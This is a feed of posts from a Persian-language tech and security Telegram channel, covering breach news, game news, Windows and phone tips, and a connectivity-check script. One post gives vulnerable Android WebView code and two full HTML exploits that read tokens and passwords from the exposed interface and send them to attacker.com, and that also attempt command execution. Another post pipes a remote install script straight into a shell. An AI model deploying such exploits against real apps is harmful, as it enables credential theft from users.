تکنولوژی،خبری،هوش مصنوعی،
166K subscribers
4.11K photos
4.63K videos
683 files
4.36K links


خبری،تکنولوژی،هوش مصنوعی،اینترنت آزاد✅️
🔹فعالیت کانال به دور از هرگونه دسته بندی سیاسی
میباشد.
تبلیغ برای VPN نداریم👋
Download Telegram
🛑هکرها به سراغ پرونده‌های پژوهشی Novo Nordisk رفتند؛ اطلاعات مطالعات بالینی در حمله سایبری سرقت شد

شرکت داروسازی Novo Nordisk اعلام کرد در یک حمله سایبری، مهاجمان به بخشی از سامانه‌های داخلی این شرکت دسترسی پیدا کرده و اطلاعات مربوط به برخی مطالعات بالینی را کپی کرده‌اند.
به گفته شرکت، داده‌های سرقت‌شده شامل اطلاعات پژوهشی و برخی مشخصات شرکت‌کنندگان مطالعات بوده، اما نام و هویت مستقیم بیماران افشا نشده است. همچنین فعالیت‌های اصلی شرکت و تولید داروها تحت تأثیر این حادثه قرار نگرفته‌اند.
این رخداد بار دیگر نشان می‌دهد داده‌های پزشکی و پژوهشی به یکی از اهداف ارزشمند مهاجمان سایبری در سراسر جهان تبدیل شده‌اند.


@ITSecurityComputer
16👍6
This media is not supported in your browser
VIEW IN TELEGRAM
🔴اولین تصویر از شهر "وایس سیتی"، شهری که بازی Gta6 تو اون جریان داره.


@ITSecurityComputer
59😍10👎2🥴2👍1
مقایسه پشم ریزون مپ GTA 6 در مقابل 5

واقعا مپ Gta v در برابرش یه شوخیه!!

@ITSecurityComputer
👍115❤‍🔥19👎7🤯43🌚1😴1
خنده دار به نظر میاد ولی پرامپتش :
«این تصاویر مربوط به میوه‌هایی است که قصد خرید آن‌ها را دارم. لطفاً به‌صورت دقیق و حرفه‌ای آن‌ها را از نظر میزان رسیدگی، تازگی، شیرینی احتمالی، کیفیت ظاهری، لکه‌ها، له‌شدگی و نشانه‌های خراب بودن بررسی کن.
در نهایت:
بهترین گزینه برای خرید را مشخص کن
ترتیب کیفیت از بهترین تا ضعیف‌ترین را بنویس
دلیل انتخابت را خیلی کوتاه و واضح توضیح بده
اگر هیچ‌کدام مناسب نیستند، صادقانه بگو و دلیلش را توضیح بده
فرض کن یک کارشناس حرفه‌ای انتخاب میوه هستی و باید بهترین انتخاب را برای یک خرید واقعی انجام بدهی.»


@ITSecurityComputer
🍓45🤣30👍143
⭕️ در زیر یک تکه کد آسیب‌پذیر آورده شده است:
WebView webview = new WebView(this);
WebSettings webSettings = webview.getSettings();
webSettings.setJavaScriptEnabled(true);
webView.addJavascriptInterface(new WebAppInterface(this), "Android");
webView.loadUrl(getIntent().getStringExtra("url"));

کد اکسپلویت کامل
<!DOCTYPE html>
<html>
<head>
    <title>POC - WebView addJavascriptInterface</title>
</head>
<body>
    <h2> Exploiting addJavascriptInterface</h2>
    <div id="result"></div>
   
    <script>
        // مرحله 1: سرقت دیتا از متدهای exposed
        try {
            var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];
            for (var method of methods) {
                try {
                    var data = window.Android[method]();
                    if (data) {
                        document.getElementById('result').innerHTML +=
                            '<p>Stolen: ' + method + ' = ' + data + '</p>';
                        fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
                    }
                } catch(e) {}
            }
        } catch(e) {}
       
        // مرحله 2: RCE (فقط در صورتی که getContext در کلاس جاوا تعریف شده باشه)
        try {
            var context = window.Android.getContext();
            var classLoader = context.getClassLoader();
            var Runtime = classLoader.loadClass('java.lang.Runtime')
                .getMethod('getRuntime', null)
                .invoke(null, null);
            Runtime.exec(['su', '-c', 'id']);
            document.getElementById('result').innerHTML += '<p> RCE Successful!</p>';
        } catch(e) {
            document.getElementById('result').innerHTML +=
                '<p> RCE not possible (no chain method)</p>';
        }
    </script>
</body>
</html>

نسخه ساده‌تر (سرقت دیتا از متود های اکسپوزد)
<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<script>
// سرقت دیتای هر متدی که در کلاس جاوا وجود داره
var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];

for (var method of methods) {
try {
var data = window.Android[method]();
if (data) {
fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
alert('Stolen: ' + data);
}
} catch(e) {}
}
</script>
</body>
</html>

نکته: این POC فرض می‌کنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن.

نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!!

برای مطالعه بیشتر: Owasp MASTG

@ITSecurityComputer
👾214🤯3😱3
🔴 میدل ایست آی : از هوش مصنوعی گروک متعلق به ایلان ماسک برای مشخص کردن 2000 تارگت در حملات اخیر به ایران استفاده شده
البته مشخص نیست که انتخاب مدرسه ی میناب به عنوان هدف هم توسط هوش مصنوعی گراک انجام شده یا نه.

@ITSecurityComputer
🤬139🤣71😱10🫡52🤷‍♂2👍2🔥2🐳2💯1💔1
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از این ویدیو 📈📈📈

اسپویل : با این ترفند هرچی حرف بزنی رو تایپ میکنه، رایگان بدون نصب هیچی

🪽 Fachlich
🍃 @ITSecurityComputer
🤣797👍5
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از اینکه مشخص میشه اصلا برای تبدیل صدا به متن نیازی به گوشی نیست : 📉📉🫪🫨

🪽 Fachlich
🍃 @ITSecurityComputer
🤣778
دیگه برای بستن برنامه‌های هنگ کرده، نیازی به Task Manager نداری حتماً برای شما هم پیش اومده که وسط کار، یه برنامه توی ویندوز قفل می‌کنه و هیچ جوره بسته نمیشه. همیشه مجبور بودیم کلی مسیر بریم، تسک منیجر رو باز کنیم و از اونجا برنامه رو به زور ببندیم (End\ Task). اما توی ویندوز ۱۱ یه قابلیت مخفی وجود داره که این دکمه رو مستقیم میاره روی نوار پایین صفحه (Taskbar) تا فقط با یک کلیک، برنامه ای هنگ کرده رو ببندید

چطوری فعالش کنیم؟
کلیدهای ترکیبی Windows + I رو بزنید تا تنظیمات (Settings) باز بشه.
از منوی سمت چپ وارد بخش System بشید.
بیاید پایین‌تر و گزینه‌ی For Developers (یا در برخی نسخه‌ها Advanced) رو پیدا کنید.
گزینه‌ی End Task رو روشن (On) کنید.
تمام حالا هر وقت برنامه‌ای قفل کرد، کافیه روی آیکونش در پایین صفحه راست‌کلیک کنید و گزینه‌ی End Task رو بزنید.

@ITSecurityComputer
31🤣10👍8❤‍🔥2
🔴 جوون ایرانی با بازی کردن GTA 6 خداحافظی کن.

راکستار : هزینه دیسک بازی GTA 6 حدود 70 تا 100 دلار تخمین زده میشه، یعنی برای داشتن این دیسک باید 11 تا 16 میلیون تومن هزینه کنید.

@ITSecurityComputer
💔156👾16🥱87👎3😴2
🔴 شاید باورتون نشه، ولی به خاطر یه تجمع ساده دانش‌آموزی، تو بعضی از مناطق کشور سرعت اینترنت به‌شدت ضعیف شده.
@ITSecurityComputer
🤣158👍10😢5😍3👎2💔21
این اپ هم کاربردیه و می‌تونه به کارت بیاد می‌تونه برنامه‌های انتخابی رو فریز کنه تا دیگه در پس‌زمینه اجرا نشن. که نتیجه میشه :
رم آزادتر
گوشی خنک‌تر
عملکرد روان‌تر
مصرف باتری کمتر
کاهش مصرف اینترنت پس‌زمینه
رایگان و متن‌باز
بدون تبلیغات

برای اپ‌هایی که کم استفاده می‌کنید، گزینه جالبیه تا منابع گوشی بیهوده مصرف نشن.

لینک دانلود از سایت رسمی

@ITSecurityComputer
👍19❤‍🔥31
لاشیا ابپز شدیم وصل کنید برقو 😐
🤣63😭5🤗4😁1💔1
یک افزونه جالب برای صرفه‌جویی در وقت این افزونه سایت‌ها رو محدود می‌کنه تا بیشتر از زمانی که تعیین کردی نتونی ازشون استفاده کنی. مثلاً می‌ری یوتیوب فقط برای دیدن یه ویدیو اما یهو غرق می‌شی و چند ساعت می‌گذره این افزونه دقیقاً جلوشو می‌گیره

لینک نصب افزونه

@ITSecurityComputer
👍112🤣2
🔻کابوس امنیت در اپل: این آسیب‌پذیری وصله نمی‌شود

🔹گروهی از محققان امنیتی یک کد مخرب عملیاتی با نام usbliter8 را منتشر کرده‌اند که به مهاجم اجازه می‌دهد کدهای دلخواه خود را در سطح SecureROM (حافظه اصلی بوت) تراشه‌های A12 و A13 اپل اجرا کند.

🔹 نکته نگران‌کننده اینجاست که این کد امنیتی در مرحله ساخت تراشه در کارخانه درون سخت‌افزار حک شده است؛ بنابراین هیچ به‌روزرسانی نرم‌افزاری قادر به رفع آن نیست.

🔹البته خطر این حمله برای کاربران عادی، پایین است؛ چرا که مهاجم باید به صورت فیزیکی به دستگاه دسترسی داشته باشد و از ابزارهای خاصی استفاده کند. با این حال، در محیط‌های حساس و سازمانی، این خبر به معنای یک زنگ خطر جدی است.

#آسیب‌پذیری #اپل


@ITSecurityComputer
🤣4911👍2😈1
Forwarded from آکادمی همراه
آخرین فرصت ثبت‌نام در دومین «بوت‌کمپ دواپس (DevOps)» آکادمی همراه اول

امروزه بسیاری از تیم‌های فناوری به دنبال متخصصانی هستند که علاوه بر توسعه نرم‌افزار، توانایی استقرار، مدیریت و نگه‌داری سرویس‌ها را نیز داشته باشند. دواپس (DevOps) یکی از مهارت‌های کلیدی و پرتقاضای بازار کار است که این فاصله را از بین می‌برد.

در این بوت‌کمپ ۱۲ هفته‌ای، با مفاهیم و ابزارهای اصلی دواپس به‌صورت عملی آشنا می‌شوید و نحوه پیاده‌سازی و مدیریت زیرساخت‌های مدرن را یاد می‌گیرید.

💎 آموزش Docker، Kubernetes، CI/CD، Infrastructure as Code و مانیتورینگ سرویس‌ها
💼 امکان کارآموزی در گروه همراه اول
🎓 همراه با گواهینامه آکادمی همراه اول
💳 امکان ثبت‌نام اقساطی
⚠️ ظرفیت محدود

اگر قصد دارید مسیر شغلی خود را در حوزه زیرساخت، کلاد و دواپس آغاز یا تقویت کنید، این آخرین فرصت ثبت‌نام در دوره است.

🌐 پیش‌ثبت‌نام رایگان و مشاهده جزئیات:
🔗 https://l.hamrah.academy/991

⭐️ @Hamrah_Academy | آکادمی همراه اول
👎53🤣1
این روزها اینترنت گاهی دچار اختلال می‌شود و ممکن است دسترسی به بعضی سایت‌ها برقرار باشد و بعضی دیگر نه. همچنین ممکن است وضعیت در اپراتورها و شبکه‌های مختلف تفاوت داشته باشد.

تو دستورش چند تا سایت اصلی گذاشتم خودتون میتونید بقیه هم اضافه کنین و هر بار با یک دستور چک کنین :

گوشی تو ترموکس :
while true; do date "+%H:%M:%S"; for i in 8.8.8.8 1.1.1.1 google.com youtube.com github.com; do ping -c 1 -W 1 $i >/dev/null && echo " $i OK" || echo " $i DOWN"; done; echo "------------------"; sleep 1; done
ویندوز :
:loop
echo %time%
for %i in (8.8.8.8 1.1.1.1 google.com youtube.com github.com) do @ping -n 1 -w 1000 %i | find "TTL=" >nul && echo [OK] %i || echo [DOWN] %i
echo ------------------
timeout /t 1 >nul
goto loop


@ITSecurityComputer
👍148🤯1
🔻افشای کلیدهای API از راه افزونه Gravity SMTP وردپرس

🔹مهاجمان سایبری در حال بهره‌برداری از یک آسیب‌پذیری امنیتی تازه وصله‌شده در افزونه Gravity SMTP وردپرس هستند؛ افزونه‌ای که روی حدود ۱۰۰ هزار وب‌سایت نصب شده است.

🔹وصله امنیتی این نقص در نسخه ۲.۱.۵ افزونه Gravity SMTP منتشر شده است. با این حال، مهاجمان پیش از انتشار گسترده وصله نیز فعالیت خود را آغاز کرده بودند.

🔹بر اساس آمار Wordfence، تاکنون بیش از ۱۷ میلیون تلاش برای بهره‌برداری از این آسیب‌پذیری مسدود شده است.

🔹متخصصان امنیتی به مدیران وب‌سایت‌هایی که همچنان از نسخه‌های آسیب‌پذیر Gravity SMTP استفاده می‌کنند توصیه کرده‌اند در اسرع وقت افزونه را به نسخه ۲.۱.۵ یا بالاتر ارتقا دهند. همچنین در صورتی که از سرویس‌های ایمیلی متصل به این افزونه استفاده شده است، باید احتمال افشای اطلاعات را جدی گرفته و تمامی کلیدها، توکن‌ها و اعتبارنامه‌های مرتبط را تعویض کنند. بازبینی لاگ‌های سرور برای شناسایی درخواست‌های مشکوک به این API نیز از دیگر اقدامات ضروری برای ارزیابی احتمال نفوذ و سوءاستفاده به شمار می‌رود.

#آسیب‌پذیری #وردپرس

@ITSecurityComputer
11👍5🤣2👏1
سورس_ربات_میرزا_پرو_نسخه_کینگ_وی_پی_ان_.zip
5.1 MB
📂 سورس میرزا پرو نسخه دکمه رنگی ایموجی پرمویم

📜 قابلیت ها:

اتصال خودکار پنل به ربات
بهینه‌سازی ربات
تنظیم رنگ دکمه ها
دارای پنل تهت وب برای تنظیم متن دکمه‌ها
اتصال به کانال/گروه دلخواه
پشتیبانی از پنل های ثنایی + مرزبان +پاسارگارد+ هیدیفای+میکروتیک + فروش دستی + وایرگارد+علیرضا تک پورت +ثنایی تک پورت + مرزنشین
بکاپ خودکار +گزارش فروش روزانه + گزارش کاربران ...
دارای قابلیت نمایندگی برای کاربران عادی
و همچنین روی هاست و سرور به راحتی ران داد میشه
و...

👨‍💻 اوپن شده در: @Source_donii

📩 برای ارائه پروژه ربات تلگرامی به آیدی زیر پیام دهید:
👉 @Mani_coder

📣 @ITSecurityComputer
8🤣5👍32
کاهش ۷۰ درصدی مصرف توکن در کلاد با Caveman

اگر از کاربران حرفه‌ای Claude Code هستید، احتمالاً زیاد با مشکل تمام شدن لیمیت روزانه یا هفتگی مواجه شده‌اید. این ابزار به هوش مصنوعی کمک می‌کند تا با حذف توضیحات اضافی، جملات را غارنشینی کند و مستقیم سر اصل مطلب برود. Caveman چیست و چه می‌کند؟
این یک اسکیل فوق‌العاده برای کلاد است که با حذف کلمات اضافی و فعل و فاعل‌بندی جملات، مصرف توکن شما را تا ۷۰ درصد کاهش می‌دهد تا بتوانید مدت زمان بیشتری را با آن کار کنید.

دستور نصب سریع برای فعال‌سازی، کافیست دستور زیر را در ترمینال خود اجرا کنید:
لینوکس :
curl -fsSL https://raw.githubusercontent.com/JuliusBrussee/caveman/main/install.sh | bash
ویندوز پاورشل :
irm https://raw.githubusercontent.com/JuliusBrussee/caveman/main/install.ps1 | iex

پس از نصب، می‌توانید با تایپ دستور /caveman در محیط چت، آن را فعال کنید. برای بازگشت به حالت عادی، عبارت "normal mode" را تایپ کنید.
لینک گیت‌هاب پروژه برای بررسی بیشتر
با این ترفند، نه تنها در مصرف توکن صرفه‌جویی می‌کنید، بلکه سرعت پاسخ‌دهی هوش مصنوعی هم به طرز چشم‌گیری افزایش پیدا می‌کند

@ITSecurityComputer
❤‍🔥9👍65